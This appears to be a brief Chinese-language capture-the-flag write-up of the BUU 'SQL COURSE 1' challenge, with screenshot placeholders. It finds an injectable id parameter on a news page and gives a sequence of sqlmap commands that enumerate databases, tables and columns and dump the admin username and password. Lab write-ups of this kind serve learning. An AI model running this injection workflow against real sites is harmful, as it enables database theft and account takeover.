BUU SQL COURSE 1

打开是这个样子

image-20210624130402357

找注入点

image-20210624130420078

image-20210624130432215

有一个登录框,有一个新闻页面

惯性思维使我先测试登录框,但是怎么尝试都出不来

image-20210624130554597

尝试查找其他注入点

image-20210624130622191

这就找到了

可能是注入点,sqlmap测试一下

python sqlmap.py -u http://ac52aaa0-21a6-4c92-8dc2-1bf155c0fb63.node3.buuoj.cn/backend/content_detail.php?id=1

image-20210624130745712

成功了,之后

python sqlmap.py -u http://ac52aaa0-21a6-4c92-8dc2-1bf155c0fb63.node3.buuoj.cn/backend/content_detail.php?id=1 --dbs

image-20210624130816609

python sqlmap.py -u http://ac52aaa0-21a6-4c92-8dc2-1bf155c0fb63.node3.buuoj.cn/backend/content_detail.php?id=1 -D news --tables

image-20210624130912386

python sqlmap.py -u http://ac52aaa0-21a6-4c92-8dc2-1bf155c0fb63.node3.buuoj.cn/backend/content_detail.php?id=1 -D news -T admin --columns

image-20210624130947825

python sqlmap.py -u http://ac52aaa0-21a6-4c92-8dc2-1bf155c0fb63.node3.buuoj.cn/backend/content_detail.php?id=1 -D news -T admin -C password,username --dump

image-20210624131026568

账号密码输入得

image-20210624131132831

最后修改:2021 年 06 月 24 日 01 : 14 PM
如果觉得我的文章对你有用,请随意赞赏